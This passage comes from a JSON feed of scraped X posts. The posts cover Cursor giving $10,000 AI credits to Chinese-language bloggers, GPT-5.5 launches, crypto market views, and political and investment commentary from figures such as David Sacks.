"https://x.com/paulg/status/2047992864118894954", + "published_at": "2026-04-25T10:55:23+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "虽然比特币回到 77,000 了,但是我还是非常悲观的\n\n我理想中的抄底价格是 35,000 的比特币\n\n感觉现在币圈虽然看起来一片欣欣向荣,但是更像是虚假繁荣,拉盘的全是一些强控筹的山寨币和小市值的 Meme,主流币除了 $BTC 和 $ETH 稍微涨了一点,其他大市值的山寨比如 $DOGE 和 $SOL 根本涨都涨不动。\n\n这种底我根本不敢抄呀,抄在半山腰至少得难受一年。\n\n感觉现在这种行情像是跌太久了跌不动了,狗庄掏点钱出来拉拉盘,榨干市场剩下的最后一点流动性,把平时比较保守但因为太久没操作的散户再钓出来收割一下。", + "url": "https://x.com/wolfyxbt/status/2047979690623955107", + "published_at": "2026-04-25T10:03:02+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "铁锤人看了一下额度有1w美金,瞬间眩晕瘫坐,如同第一次看到原子弹爆炸!", + "url": "https://x.com/lxfater/status/2047971888409051368", + "published_at": "2026-04-25T09:32:02+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 卧槽!Cursor 开始支持中文区 AI 博主了!\n这几天 Cursor 的团队成员 @edwinarbus 陆续私信了几位影响力较大的 Ai 博主,资助 1w 美金的免费额度, 算是头部 AI 产品首次对中文区做投放。但额度有时间限制,必须在 5 月 31 之前消耗掉。\n\n现在中文区只有极少部分的 KOL 拿到这个额度,所以含金量极高,统计到的只有 15 位博主,其中只有 3 位是币圈赛道的博主,分别是:\n• 杀破狼 @wolfyxbt\n• 0xAA:@0xAA_Science\n• 比特币橙子 @oragnes\n\n其他的都是纯 AI 赛道的博主,建议给他们都点个关注,毕竟算是 Cursor 认证的博主,他们的推特:\n@lxfater 、@Pluvio9yte 、 @frxiaobei 、@berryxia 、 @realNyarime 、 @dingyi 、 @CuiMao 、 @runes_leo 、 @bozhou_ai 、 @GoSailGlobal 、 @gkxspace 、 @Stv_Lynn\n\n此信息收集多数来自于 @GoSailGlobal 博主的推文", + "url": "https://x.com/bozhou_ai/status/2047968587902820543", + "published_at": "2026-04-25T09:18:55+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: GitHub outages since Microsoft acquisition 🤣", + "url": "https://x.com/paulg/status/2047957234664030380", + "published_at": "2026-04-25T08:33:48+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我靠 Cursor 刚刚送了我 10,000 美金的额度!\n\n感谢 @cursor_ai @edwinarbus 的恩赐,这周马上回归使用 Cursor!", + "url": "https://x.com/wolfyxbt/status/2047948998250840240", + "published_at": "2026-04-25T08:01:04+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "现在全中推的人都在求Cursor的额度了😂", + "url": "https://x.com/lxfater/status/2047930707784487236", + "published_at": "2026-04-25T06:48:24+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "去了趟书店,被震惊了,到底谁在买这些书啊😅", + "url": "https://x.com/gkxspace/status/2047922526685155786", + "published_at": "2026-04-25T06:15:53+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "忘了说了其实我也有👉👈\n\n感谢 @cursor_ai ,这周尽快把 Stakka 给 ship 出来!", + "url": "https://x.com/Stv_Lynn/status/2047909458484040105", + "published_at": "2026-04-25T05:23:57+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我过去 2 周的总曝光量是 1320 万,收益是 1799.75 美金。\n\n平均算下来,每 1 次曝光有 0.000136 美金的收益;\n\n每 1 万次曝光 1.36 美金的收益。", + "url": "https://x.com/wolfyxbt/status/2047908983101628720", + "published_at": "2026-04-25T05:22:04+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "嘿嘿,半夜睡不着占了点优势", + "url": "https://x.com/lxfater/status/2047892472177844641", + "published_at": "2026-04-25T04:16:28+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: Cursor官方认证博主✅ 你值得关注\n\n11位晒Cursor $10,000额度博主,按X发帖时间大致排序\n\n1️⃣ 铁锤人 (@lxfater)\n 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人\n \n推文链接:https://x.com/lxfater/status/2047738439823733097\n\n2️⃣ 雪踏乌云 (@Pluvio9yte)\n 简介:聚焦 AI & Vibe coding & Prompt & Agent,大厂创业产品(年固定收入7位数),分享AI编程&出海干货\n \n推文链接:https://x.com/Pluvio9yte/status/2047768818702069974\n\n3️⃣ 比特币橙子Trader (@oragnes)\n 简介:Bitcoin Holder | Crypto Investor & Research | AI | OpenClaw | VibeCoding\n \n推文链接:https://x.com/oragnes/status/2047843289571942533\n\n4️⃣ 凡人小北 (@frxiaobei)\n 简介:行道途中。在真实业务与组织中持续验证 AI 的价值与边界 | 个人IP|商业与管理|AI 咨询\n \n推文链接:https://x.com/frxiaobei/status/2047846324771713490\n\n5️⃣http://Berryxia.AI (@berryxia)\n 简介:Building AI tools | AI System Prompt | Love Design & Coding & Share Prompt\n \n推文链接:https://x.com/berryxia/status/2047845995220988355\n\n6️⃣奶昔 (@realNyarime)\n 简介:乃月希 aka Nyarime|Founder of Naixi Networks|Developer|Photographer\n \n推文链接:https://x.com/realNyarime/status/2047834820169146559\n\n7️⃣Ding (@dingyi)\n 简介:promote your product(产品推广专家)\n \n推文链接:https://x.com/dingyi/status/2047834056734437561\n\n8️⃣CuiMao (@CuiMao)\n 简介:AI Developer / NVIDIA YES / 深度学习 / 不接广告\n 推文链接:https://x.com/CuiMao/status/2047875131113111770\n\n9️⃣Leo (@runes_leo)\n 简介:预测市场策略 · AI 工具实战 · 独立构建日常 | Prediction markets × AI tools\n \n推文链接:https://x.com/runes_leo/status/2047874815399502287\n\n🔟泊舟 (@bozhou_ai)\n 简介:AI 程序员 & Vibe 编码者 | 构建 Agent、系统提示与高效流程 | AI中转站创业中\n \n推文链接:https://x.com/bozhou_ai/status/2047847486430286317\n\n🔟1️⃣Jason Zhu (@GoSailGlobal)\n 简介:独立开发,SaaS出海,AI价值内容分享 | GoSail Lab(MCN Founder,承接产品推广)\n\n 推文链接:https://x.com/GoSailGlobal/status/2047887839791345678", + "url": "https://x.com/bozhou_ai/status/2047891848908472433", + "published_at": "2026-04-25T04:13:59+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "RT by @gkxspace: Cursor官方认证博主✅ 你值得关注\n\n11位晒Cursor $10,000额度博主,按X发帖时间大致排序\n\n1️⃣ 铁锤人 (@lxfater)\n 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人\n \n推文链接:https://x.com/lxfater/status/2047738439823733097\n\n2️⃣ 雪踏乌云 (@Pluvio9yte)\n 简介:聚焦 AI & Vibe coding & Prompt & Agent,大厂创业产品(年固定收入7位数),分享AI编程&出海干货\n \n推文链接:https://x.com/Pluvio9yte/status/2047768818702069974\n\n3️⃣ 比特币橙子Trader (@oragnes)\n 简介:Bitcoin Holder | Crypto Investor & Research | AI | OpenClaw | VibeCoding\n \n推文链接:https://x.com/oragnes/status/2047843289571942533\n\n4️⃣ 凡人小北 (@frxiaobei)\n 简介:行道途中。在真实业务与组织中持续验证 AI 的价值与边界 | 个人IP|商业与管理|AI 咨询\n \n推文链接:https://x.com/frxiaobei/status/2047846324771713490\n\n5️⃣http://Berryxia.AI (@berryxia)\n 简介:Building AI tools | AI System Prompt | Love Design & Coding & Share Prompt\n \n推文链接:https://x.com/berryxia/status/2047845995220988355\n\n6️⃣奶昔 (@realNyarime)\n 简介:乃月希 aka Nyarime|Founder of Naixi Networks|Developer|Photographer\n \n推文链接:https://x.com/realNyarime/status/2047834820169146559\n\n7️⃣Ding (@dingyi)\n 简介:promote your product(产品推广专家)\n \n推文链接:https://x.com/dingyi/status/2047834056734437561\n\n8️⃣CuiMao (@CuiMao)\n 简介:AI Developer / NVIDIA YES / 深度学习 / 不接广告\n 推文链接:https://x.com/CuiMao/status/2047875131113111770\n\n9️⃣Leo (@runes_leo)\n 简介:预测市场策略 · AI 工具实战 · 独立构建日常 | Prediction markets × AI tools\n \n推文链接:https://x.com/runes_leo/status/2047874815399502287\n\n🔟泊舟 (@bozhou_ai)\n 简介:AI 程序员 & Vibe 编码者 | 构建 Agent、系统提示与高效流程 | AI中转站创业中\n \n推文链接:https://x.com/bozhou_ai/status/2047847486430286317\n\n🔟1️⃣Jason Zhu (@GoSailGlobal)\n 简介:独立开发,SaaS出海,AI价值内容分享 | GoSail Lab(MCN Founder,承接产品推广)\n\n 推文链接:https://x.com/GoSailGlobal/status/2047887839791345678", + "url": "https://x.com/gkxspace/status/2047891848908472433", + "published_at": "2026-04-25T04:13:59+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "卧槽,收到 Cursor 送的 10,000u AI 额度! \n\n昨天 @edwinarbus 联系我送额度的时候,我还以为是骗子。不过挂着 cursor 的标,而且只是要个邮箱,我抱着试一试的态度回复了,没想道还真送了!\n这个月要多 vibe coding 些狗屎了! @VibeShit_Org @cursor_ai", + "url": "https://x.com/0xAA_Science/status/2047889676867080420", + "published_at": "2026-04-25T04:05:21+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://x.com/DavidSacks/status/2047877294476116184", + "published_at": "2026-04-25T03:16:09+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "R to @wolfyxbt: 为了利于大家分析,这里发一下我自己的后台数据", + "url": "https://x.com/wolfyxbt/status/2047877064104284194", + "published_at": "2026-04-25T03:15:14+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://x.com/DavidSacks/status/2047871382923469241", + "published_at": "2026-04-25T02:52:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://x.com/DavidSacks/status/2047867592790946189", + "published_at": "2026-04-25T02:37:36+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "卧槽!牛逼牛逼!\n\n这两周的工资涨到了 1799 美金!\n\nThank you Elon Musk!", + "url": "https://x.com/wolfyxbt/status/2047865010182148284", + "published_at": "2026-04-25T02:27:20+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 \n\n2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。", + "url": "https://x.com/svwang1/status/2047858045057909226", + "published_at": "2026-04-25T01:59:39+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Cursor大善人,我也已经领到了,在X上获得的最大一笔收入", + "url": "https://x.com/bozhou_ai/status/2047847486430286317", + "published_at": "2026-04-25T01:17:42+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://x.com/DavidSacks/status/2047842000632713369", + "published_at": "2026-04-25T00:55:54+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this was a good week.\n\nproud of the team.\n\nhappy building!", + "url": "https://x.com/sama/status/2047823357635354814", + "published_at": "2026-04-24T23:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://x.com/DavidSacks/status/2047823154655932696", + "published_at": "2026-04-24T23:41:01+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://x.com/DavidSacks/status/2047808256047821141", + "published_at": "2026-04-24T22:41:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world.", + "url": "https://x.com/HarryStebbings/status/2047792195868967172", + "published_at": "2026-04-24T21:38:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being credits/token hungry). GPT 5.5 is more token-efficient in subagent orchestration.", + "url": "https://x.com/AravSrinivas/status/2047788775468908840", + "published_at": "2026-04-24T21:24:24+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 这是一个关于两个程序员开的Claude Code中转站的呕心沥血的故事,一张聊天记录诠释web2从业者开发的中转站有多负责\n\n今晚要进行数据库迁移,负载均衡配置,与sub2的版本对齐,还有很多为了用户体验上新的功能模块。\n于是我和泊舟 @bozhou_ai 商议凌晨2点到4点进行停机更新。\n\n泊舟明天周日要上班,陪我熬到了三点半。我今天早上要给猫打疫苗,约了早上8点的医院。在这种情况下,我们也一直撑着直到验收完所有的功能才撑着下线。\n\n时至今日,http://dragoncode.codes 几乎已经看不出是改自开源项目的痕迹了。大量的教学文档,余额预警、工单系统、代理商分销,都是我和泊舟一天一天敲出来的。\n\n说实话这个中转站开了一个月了,说实话,也没有当初设想的那么赚钱。与付出的时间相比,于我来说赚的并不多。\n我并不精通运维,出现过好几次故障,也熬过好几次通宵。好几次想跟泊舟说,我想放弃了。但因为有好几次令我心暖的事情,我坚持了下来。\n\n第一次是在工作日,redis缓存满了导致不可用,要迁移,售后群里的兄弟们没有出言压力,而是说相信我们,鼓励我们,我那个时候觉得这或许有些意义\n\n第二次是很多模块上新,我连着熬了好几天长夜,我主业工作白天强度也很高,每次早上都是打上车就立刻睡着的,好几次到地方都是司机把我叫醒。\n\n第三次我们招了个实习生,但是实习生开发的模块并不理想,因为不了解业务的原因,开发的功能有不符也有冗余,于是我跟泊舟说,还是我亲自来吧。\n\n第四次是跟泊舟得知有个人竟然一天卖20万rmb的token,泊舟憧憬说,🐴的,但凡我们有他一半就好了。我打趣说,舟子,你做梦呢。我是悲观主义,这么一看其实有个这样的朋友也挺好,还能打打鸡血。\n\n很多时候正在工作,泊舟甩过来一个B端用户的报错——这不得不立刻查,耽误了B端用户可能就觉得体验不好跑了。\n\n好几次接近不想干下去了,但是一想我跑路了泊舟一个人压力该有多大,同时也看到了群里的兄弟说“乌云早期的教程很有帮助” “我一个小白在这个群都能学到很多”,而且有时候潜水看群里看到群里也有跟我一样半夜熬到三点的兄弟,觉得很开心,最后才继续了下来。\n\n实际上,我们的站才刚刚运行一个月,但是我们一直在猛追进度,尽力把用户体验这块做到极致,所以所有的进度才会那么赶。\n\n一晚上,2小时,GPT Pro的额度打了百分之40,就为了快速修bug,在一开始说的维护结束时间凌晨4点之前准时恢复。\n做生意就是这样——信任建立很难,但是崩塌很容易,我们尽量维护好每一个承诺。", + "url": "https://x.com/bozhou_ai/status/2047776887116874076", + "published_at": "2026-04-24T20:37:10+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download", + "url": "https://x.com/cursor_ai/status/2047764656165646786", + "published_at": "2026-04-24T19:48:34+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Introducing /multitask in the new Cursor 3 interface.\n\nCursor can now run async subagents to parallelize your requests instead of adding them to the queue.\n\nFor already queued messages, you can ask Cursor to multitask on them instead of waiting for the current run to finish.", + "url": "https://x.com/cursor_ai/status/2047764651363180839", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter", + "title_zh": "Cursor 3更新支持多任务处理功能,通过并行分发异步子代理提升请求处理效率,用户无需等待当前任务完成即可并发执行已排队消息。" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes.\n\nA single agent session can now target a reusable workspace made of multiple folders.", + "url": "https://x.com/cursor_ai/status/2047764654760632725", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know your feedback!", + "url": "https://x.com/AravSrinivas/status/2047753276888854595", + "published_at": "2026-04-24T19:03:21+00:00", + "source": "nitter", + "title_zh": "Perplexity Computer启动GPT-5.5默认协调模型部署,逐步替代原有Opus 4.7版本,并将持续监测用户反馈与系统表现。" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://x.com/eladgil/status/2047748613976264835", + "published_at": "2026-04-24T18:44:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers.\n\nGPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.", + "url": "https://x.com/AravSrinivas/status/2047748486767272243", + "published_at": "2026-04-24T18:44:19+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "GPT-5.5 is now available in Cursor!\n\nIt's currently the top model on CursorBench at 72.8%.\n\nWe've partnered with OpenAI to offer it for 50% off through May 2.", + "url": "https://x.com/cursor_ai/status/2047744579127185843", + "published_at": "2026-04-24T18:28:47+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: More on CursorBench: http://cursor.com/blog/cursorbench", + "url": "https://x.com/cursor_ai/status/2047744580280561948", + "published_at": "2026-04-24T18:28:47+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @cursor_ai: 兄弟们1w美金 TOKEN呀\n\nhttps://x.com/lxfater/status/2047738439823733097?s=20", + "url": "https://x.com/lxfater/status/2047738989571154030", + "published_at": "2026-04-24T18:06:34+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.", + "url": "https://x.com/DavidSacks/status/2047717649849659586", + "published_at": "2026-04-24T16:41:47+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。\n\n投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。", + "url": "https://x.com/svwang1/status/2047703469063377001", + "published_at": "2026-04-24T15:45:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal:\nhttps://cnb.cx/4d3HAKp", + "url": "https://x.com/DavidSacks/status/2047703023690924289", + "published_at": "2026-04-24T15:43:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about are the quality of their products, and we don’t want the bias creeping into the products.\"", + "url": "https://x.com/DavidSacks/status/2047694657107165519", + "published_at": "2026-04-24T15:10:25+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it.", + "url": "https://x.com/ylecun/status/2047680485208531152", + "published_at": "2026-04-24T14:14:06+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview.", + "url": "https://x.com/ylecun/status/2047676640059154653", + "published_at": "2026-04-24T13:58:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share", + "url": "https://x.com/DavidSacks/status/2047672359377588241", + "published_at": "2026-04-24T13:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs were going away?", + "url": "https://x.com/DavidSacks/status/2047671706660073767", + "published_at": "2026-04-24T13:39:13+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我也很爱吃瓜,但我觉得还是得理性吃瓜\n\n昨天 Tron 上面有 3.44 亿的 $USDT 被 Tether 冻结了,有人说这是川普家族开始对孙哥进行打压了,但是这些钱跟孙哥和 Tron 基金会根本没有一点关系 😂\n\n这些钱是柬埔寨参议员 Kok An 相关的一些资金,因为涉及了东南亚杀猪盘、网络诈骗和人口贩卖等等的犯罪,所以才被美国执法机构申请冻结了。\n\nTether 一直以来都会联合美国的执法机构对一些涉及犯罪的 $USDT 进行冻结,这没有什么好大惊小怪的,这也不是第一次冻结了,一直以来都有类似的冻结事件。", + "url": "https://x.com/wolfyxbt/status/2047669267475419273", + "published_at": "2026-04-24T13:29:31+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "今晚由于本次版本升级较大,4月25日凌晨2-4点,将进行停机更新,期间将不可用\n\n更新内容:\n1. GPT-image2 上线 3分钱一张\n2. 订单查询\n3. 发票信息管理和开票\n4. 设置余额预警\n5. 投诉与意见反馈\n6. bug修复还有性能优化", + "url": "https://x.com/bozhou_ai/status/2047668172204188156", + "published_at": "2026-04-24T13:25:10+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://x.com/JeffDean/status/2047665074471387456", + "published_at": "2026-04-24T13:12:52+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://x.com/naval/status/2047645157080658335", + "published_at": "2026-04-24T11:53:43+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "兄弟们,这个邀请码太难搞了\n\n我找官方要了一些,大家给 OpenClaw/Hermes Agent 配置一个免费的AI邮箱\n\nClawEmail 